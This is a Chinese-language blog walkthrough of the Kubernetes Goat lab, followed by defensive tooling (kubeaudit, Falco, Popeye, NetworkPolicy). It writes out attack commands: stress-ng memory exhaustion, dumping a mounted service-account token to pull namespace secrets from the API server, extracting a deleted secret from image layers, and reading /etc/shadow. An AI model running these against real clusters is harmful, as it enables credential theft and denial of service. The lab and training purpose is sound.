302af9807534 k8s_POD_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-4230-9265-1447b8317e0d_0 0.00% 1.227MiB / 15.64GiB 0.01% 0B / 0B 0B / 0B 1

执行下面命令进行压力测试,–vm是启动8个worker去匿名mmap,–vm-bytes是每个worker分配的内存,但是我设置2G发现16内存没用满,只用了2-3G,所以索性改为16G,最后–timeout就是压力测试60s后停止

1
stress-ng --vm 8 --vm-bytes 16G --timeout 60s

下面是压力测试中在node执行htop的截图

在node执行docker stats | grep hunger,到后面直接就获取不了

这样可能会使其他pod可能无法获得执行的资源,无法处理用户请求或者超级卡顿,假如是自己的服务器可能消耗更多的电费,假如是云服务则可能需要支付更加昂贵的账单。

我们查看一下部署的yaml文件,可以看到资源限制是被注释掉的,不过1000G跟没限制也差不多了

Hacker container

1
kubectl run -it --rm hacker-container --image=madhuakula/hacker-container -- sh

启动pod后我们可以用amicontained评估容器的权限等信息

1
2
3
4
5
6
7
8
9
10
11
12
~ # amicontained
Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (22):
MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE KEXEC_FILE_LOAD
Looking for Docker.sock

还可以用里面的nikto进行web漏洞扫描,看着效果不怎么样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~ # nikto.pl -host http://metadata-db
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.105.74.206
+ Target Hostname: metadata-db
+ Target Port: 80
+ Start Time: 2022-06-22 08:20:04 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7373 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-06-22 08:21:53 (GMT0) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

隐藏在镜像层中的信息

在docker镜像中,很容易可能将密码、私钥、令牌等放入到了镜像中

作者设计了一个hidden-in-layers的jobs

1
2
3
4
5
$ kubectl get jobs
NAME COMPLETIONS DURATION AGE
batch-check-job 1/1 36s 6d5h
hidden-in-layers 0/1 6d5h 6d5h
kube-bench-node 1/1 29s 46h

查看部署文件,确认镜像名称

1
2
$ cat ~/kubernetes-goat/scenarios/hidden-in-layers/deployment.yaml | grep image
image: madhuakula/k8s-goat-hidden-in-layers

到node查看镜像的信息,通过docker inspect可以看到最终执行的cmd命令,但是这样只能看到一个命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$  madhuakula/k8s-goat-hidden-in-layers | grep "Cmd" -A 5
"Cmd": null,
"Image": "",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": null,
"OnBuild": null,
--
"Cmd": [
"sh",
"-c",
"tail -f /dev/null"
],
"ArgsEscaped": true,

之前已经用过docker history来看每一层所执行的命令了,这里我们可以看到一个/root/secret.txt的文件,但是在后面删掉了

1
2
3
4
5
6
7
8
$ docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc75561773bd68607 5 weeks ago CMD ["sh" "-c" "tail -f /dev/null"] 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/contribution.txt && rm -rf /root/secret.txt # buildkit 28B buildkit.dockerfile.v0
<missing> 5 weeks ago ADD secret.txt /root/secret.txt # buildkit 41B buildkit.dockerfile.v0
<missing> 5 weeks ago LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat 0B buildkit.dockerfile.v0
<missing> 2 months ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 2 months ago /bin/sh -c #(nop) ADD file:5d673d25da3a14ce1f6cf66e4c7fd4f4b85a3759a9d93efb3fd9ff852b5b56e4 in / 5.57MB

还有一个工具是https://hub.docker.com/r/alpine/dfimage,这个更全面,基于https://github.com/P3GLEG/Whaler进行构建的,可以搜索secret files(通过将image保存到文件,之后解压搜索里面的文件),打印环境变量(docker inspect获取),具体实现可以查看https://github.com/P3GLEG/Whaler/blob/master/main.gohttps://github.com/P3GLEG/Whaler/blob/master/scanner.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
$ dfimage madhuakula/k8s-goat-hidden-in-layers:latest
Analyzing madhuakula/k8s-goat-hidden-in-layers:latest
Docker Version:
GraphDriver: overlay2
Environment Variables
|PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Image user
|User is root

Potential secrets:
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-5243ef4b.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-5261cecb.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux.org-61666e3f.rsa.pub Possible public key \.pub$ 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
|Found match etc/udhcpd.conf DHCP server configs dhcpd[^ ]*.conf 79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
Dockerfile:
CMD ["/bin/sh"]
LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
ADD secret.txt /root/secret.txt # buildkit
root/
root/secret.txt

RUN RUN echo "Contributed by Rewanth Cool" >> /root/contribution.txt \
&& rm -rf /root/secret.txt # buildkit
CMD ["sh" "-c" "tail -f /dev/null"]

可以看到ADD secret.txt /root/secret.txt之后的几行有点异常,不过影响不大

搜索dfimage的时候,还有一个github上也叫dfimage的可以将镜像还原成一个Dockerfile,是基于docker history,不用我们自己手动还原

1
https://github.com/LanikSJ/dfimage/blob/3d55b88596d5eec8d4beff171ad5d4931043ad19/entrypoint.py#L17

执行结果FROM这个输出肯定是不对的了,第二行也看不出什么

1
2
3
4
5
6
7
8
9
$ docker run -v /var/run/docker.sock:/var/run/docker.sock dfimage madhuakula/k8s-goat-hidden-in-layers:latest
FROM madhuakula/k8s-goat-hidden-in-layers:latest
ADD file:90e56af13188c7f0283d244a0d70b853d8bef8587a41f1da8eac3a2aba8964ef in /
CMD ["/bin/sh"]
RUN LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
RUN ADD secret.txt /root/secret.txt # buildkit
RUN RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/contribution.txt \
&& rm -rf /root/secret.txt # buildkit
RUN CMD ["sh" "-c" "tail -f /dev/null"]

但是这只是让我们看到有这个文件,我们需要看看这个文件,直接启动容器肯定没有,因为已经删掉了

1
2
3
4
5
6
7
8
9
10
11
12
$ kubectl run test --rm --restart=Never -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh
If you don't see a command prompt, try pressing enter.
/ # ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
/ # cd root/
~ # ls -la
total 16
drwx------ 1 root root 4096 Jun 24 08:33 .
drwxr-xr-x 1 root root 4096 Jun 24 08:29 ..
-rw------- 1 root root 19 Jun 24 08:34 .ash_history
-rw-r--r-- 1 root root 28 May 16 20:41 contribution.txt
~ #

但是在删掉的那一层的上一层还有,我们可以先将整个image保存到文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# root @ nsfocus  in ~ [16:35:15]
$ mkdir hidden-in-layers
# root @ nsfocus in ~ [16:35:24]
$ docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers/hidden-in-layers.tar
# root @ nsfocus in ~ [16:35:48]
$ cd hidden-in-layers/
# root @ nsfocus in ~/hidden-in-layers [16:35:52]
$ tar -xvf hidden-in-layers.tar
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/VERSION
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/json
66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/layer.tar
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/VERSION
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/json
79cf3b8a6b51ac05a78de2a347855d9be39bb7300a6df1a1094cdab616745f78/layer.tar
8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc75561773bd68607.json
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/VERSION
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/json
c8e3854bdc614a630d638b7cb682ed66c824e25b5c7a37cf14c63db658b99723/layer.tar
manifest.json
repositories

这里面有3层是有layer.tar文件的,少的时候我们当然可以全部一个一个解压,去找secret.txt

但是有个工具可以快速确认是哪个id的layer.tar,就是dive

1
2
wget https://github.com/wagoodman/dive/releases/download/v0.10.0/dive_0.10.0_linux_amd64.deb
apt install ./dive_0.10.0_linux_amd64.deb

运行

1
dive madhuakula/k8s-goat-hidden-in-layers

通过下图,我们就知道在66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535那里

最终获取到secret.txt文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# root @ nsfocus  in ~/hidden-in-layers [16:39:52]
$ cd 66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:39:54]
$ ls
json layer.tar VERSION
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:39:55]
$ tar -xf ./layer.tar
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:40:05]
$ ls
json layer.tar root VERSION
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535 [16:40:07]
$ cd root/
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/root [16:40:10]
$ ls
secret.txt
# root @ nsfocus in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc34462e80cf7cf01a3c4f8989ac794dfe95df535/root [16:40:12]
$ cat secret.txt
k8s-goat-3b7a7dc7f51f4014ddf3446c25f8b772

RBAC 最低权限配置错误

在 Kubernetes 早期,没有 RBAC(role-based access control,基于角色的访问控制)这样的概念,主要使用 ABAC(attribute-based access control,基于属性的访问控制)。现在它拥有像 RBAC 这样的超能力来实现最小权限的安全原则。尽管如此,有时权限还是给多了。

目标挑战是查找k8svaultapikey

默认情况下,Kubernetes 将所有令牌和服务帐户信息存储在/var/run/secrets/kubernetes.io/serviceaccount/

1
2
3
4
5
6
7
8
9
10
root@hunger-check-deployment-56d65977f6-k68g9:/# cd /var/run/secrets/kubernetes.io/serviceaccount/
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# ls -la
total 4
drwxrwxrwt 3 root root 140 Jun 24 08:50 .
drwxr-xr-x 3 root root 4096 Jun 16 02:55 ..
drwxr-xr-x 2 root root 100 Jun 24 08:50 ..2022_06_24_08_50_43.045810252
lrwxrwxrwx 1 root root 31 Jun 24 08:50 ..data -> ..2022_06_24_08_50_43.045810252
lrwxrwxrwx 1 root root 13 Jun 16 02:53 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Jun 16 02:53 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Jun 16 02:53 token -> ..data/token

一些目录和地址在环境变量都有

1
2
3
4
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep SERVICEACCOUNT
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep KUBERNETES_SERVICE_HOST
KUBERNETES_SERVICE_HOST=10.96.0.1
1
2
3
4
5
6
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# 命令空间路径
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt

这时我们就可以访问api服务器了,也看得服务器的真实ip

1
2
3
4
5
6
7
8
9
10
11
12
13
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.2.174:6443"
}
]
}

查询default命名空间的secrets,可以看到没权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ curl --cacert ${CACERT} --header "Athorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {

},
"status": "Failure",
"message": "secrets is forbidden: User \"system:serviceaccount:big-monolith:big-monolith-sa\" cannot list resource \"secrets\" in API group \"\" at the cluster scope",
"reason": "Forbidden",
"details": {
"kind": "secrets"
},
"code": 403
}

查看当前命名空间中的secrets

1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets

查看当前命名空间中的pods

1
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods
1
2
3
4
5
6
7
$ curl --cacert ${CACERT} --header "Athorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9984 0 9984 0 0 154k 0 --:--:-- --:--:-- --:--:-- 154k
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"k8svaultapikey\":\"azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"vaultapikey\",\"namespace\":\"big-monolith\"},\"type\":\"Opaque\"}\n"
"fieldsV1": {"f:data":{".":{},"f:k8svaultapikey":{}},"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:type":{}}
"k8svaultapikey": "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U="

看着是base64

1
2
$ echo "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=" | base64 -d
k8s-goat-85057846a8046a25b35f38f3a2649dce

我们回头来看部署的yaml,可以看到resources直接给了所有resources的get、 watch 和 list权限

KubeAudit - 审计 Kubernetes 集群

kubeaudit是一个开源工具,这个工具需要cluster administrator privileges,tiller 这个账户有这个权限,所以指定serviceaccount为tiller启动hacker容器,但是我这没有这个账户,

1
2
3
$ kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
Flag --serviceaccount has been deprecated, has no effect and will be removed in the future.
Error from server (Forbidden): pods "bash" is forbidden: error looking up service account kube-system/tiller: serviceaccount "tiller" not found

我觉得本地模式ocal Mode最方便,直接在master下载一个bin,直接运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
$ ./kubeaudit all
W0627 14:19:28.628353 95337 warnings.go:70] v1 ComponentStatus is deprecated in v1.19+
W0627 14:19:32.831222 95337 warnings.go:70] extensions/v1beta1 Ingress is deprecated in v1.14+, unavailable in v1.22+; use networking.k8s.io/v1 Ingress
W0627 14:19:33.253577 95337 warnings.go:70] policy/v1beta1 PodSecurityPolicy is deprecated in v1.21+, unavailable in v1.25+

---------------- Results for ---------------

apiVersion: v1
kind: Namespace
metadata:
name: big-monolith

--------------------------------------------

-- [error] MissingDefaultDenyIngressAndEgressNetworkPolicy
Message: Namespace is missing a default deny ingress and egress NetworkPolicy.
Metadata:
Namespace: big-monolith

......
......
......
---------------- Results for ---------------

apiVersion: apps/v1
kind: Deployment
metadata:
name: hunger-check-deployment
namespace: big-monolith

--------------------------------------------

-- [error] AppArmorAnnotationMissing
Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hunger-check' should be added.
Metadata:
Container: hunger-check
MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hunger-check

-- [error] CapabilityOrSecurityContextMissing
Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
Metadata:
Container: hunger-check

-- [warning] ImageTagMissing
Message: Image tag is missing.
Metadata:
Container: hunger-check

-- [warning] LimitsNotSet
Message: Resource limits not set.
Metadata:
Container: hunger-check

-- [error] RunAsNonRootPSCNilCSCNil
Message: runAsNonRoot should be set to true or runAsUser should be set to a value > 0 either in the container SecurityContext or PodSecurityContext.
Metadata:
Container: hunger-check

-- [error] AllowPrivilegeEscalationNil
Message: allowPrivilegeEscalation not set which allows privilege escalation. It should be set to 'false'.
Metadata:
Container: hunger-check

-- [warning] PrivilegedNil
Message: privileged is not set in container SecurityContext. Privileged defaults to 'false' but it should be explicitly set to 'false'.
Metadata:
Container: hunger-check

-- [error] ReadOnlyRootFilesystemNil
Message: readOnlyRootFilesystem is not set in container SecurityContext. It should be set to 'true'.
Metadata:
Container: hunger-check

-- [error] SeccompAnnotationMissing
Message: Seccomp annotation is missing. The annotation seccomp.security.alpha.kubernetes.io/pod: runtime/default should be added.
Metadata:
MissingAnnotation: seccomp.security.alpha.kubernetes.io/pod
......
......
......
---------------- Results for ---------------

apiVersion: batch/v1
kind: Job
metadata:
name: hidden-in-layers
namespace: default

--------------------------------------------

-- [error] AppArmorAnnotationMissing
Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hidden-in-layers' should be added.
Metadata:
Container: hidden-in-layers
MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hidden-in-layers

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' on either the ServiceAccount or on the PodSpec or a non-default service account should be used.

-- [error] CapabilityOrSecurityContextMissing
Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
Metadata:
Container: hidden-in-layers

通过查看结果,这个工具会对Namespace、Deployment 、DaemonSet和Job这些类型进行检查。

Falco - 运行时安全监控和检测

需要安装helm v3,安装:https://helm.sh/docs/intro/install/

将 helm chart 部署到 Kubernetes 集群中,并安装falco

1
2
3
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:39:48]
$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories
# root @ k8s-master in ~/kubernetes-goat/kubeaudit [14:40:12]
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
# root @ k8s-master in ~/kubernetes-goat/kubeaudit [14:42:00]
$ helm install falco falcosecurity/falco
NAME: falco
LAST DEPLOYED: Mon Jun 27 14:50:10 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


Tip:
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick.
Full list of outputs: https://github.com/falcosecurity/charts/tree/master/falcosidekick.
You can enable its deployment with `--set falcosidekick.enabled=true` or in your values.yaml.
See: https://github.com/falcosecurity/charts/blob/master/falcosidekick/values.yaml for configuration values.

Falco 可以检测任何涉及进行 Linux 系统调用的行为并发出警报。Falco 警报可以通过使用特定的系统调用、它们的参数以及调用进程的属性来触发。例如,Falco 可以轻松检测事件,包括但不限于:

  • shell 在 Kubernetes 的容器或 pod 中运行。
  • 容器正在特权模式下运行,或者mount到敏感路径,比如/proc。
  • 生成意外的子进程。
  • 意外读取敏感文件,例如/etc/shadow.
  • 将非设备类型的文件写入/dev.
  • 标准的系统二进制文件(例如ls)对外网络连接。
  • 特权 pod 在 Kubernetes 集群中启动。

查看falco pod的状态

1
kubectl get pods --selector app=falco

从 Falco 系统获取日志

1
kubectl logs -f -l app=falco

我们尝试启动一个madhuakula/hacker-container,并读取敏感文件/etc/shadow,看看falco是否会检测到

1
2
3
kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
cat /etc/shadow
vi /etc/shadow

手动获取的日志因为输出缓存区的原因可能输出会延迟,所以想快点看到结果可以多次执行命令

Popeye - Kubernetes 集群sanitizer

Popeye 是一个实用程序,可扫描实时 Kubernetes 集群并报告已部署资源和配置的潜在问题。

能够检测的问题可以查看https://popeyecli.io/的Sanitizers标题

下载

1
2
wget https://github.com/derailed/popeye/releases/download/v0.10.0/popeye_Linux_x86_64.tar.gz
tar -xvf popeye_Linux_x86_64.tar.gz

直接运行二进制文件即可

最后还给你的集群评个分

使用 NSP 保护网络边界

创建实验环境,启动一个nginx

1
kubectl run --image=nginx website --labels app=website --expose --port 80

启动另一个pod尝试访问这个nginx,可以看到可以访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ kubectl run --rm -it --image=alpine temp -- sh
If you don't see a command prompt, try pressing enter.
/ # wget -qO- http://website
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
/ #

新建一个Network策略文件website-deny.yaml

1
2
3
4
5
6
7
8
9
10
11
12
$ cat website-deny.yaml 
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: website-deny
spec:
podSelector:
matchLabels:
app: website
ingress: []
```
应用这个策略

$ kubectl apply -f website-deny.yaml
networkpolicy.networking.k8s.io/website-deny created

1
再次启动一个临时pod访问
打赏专区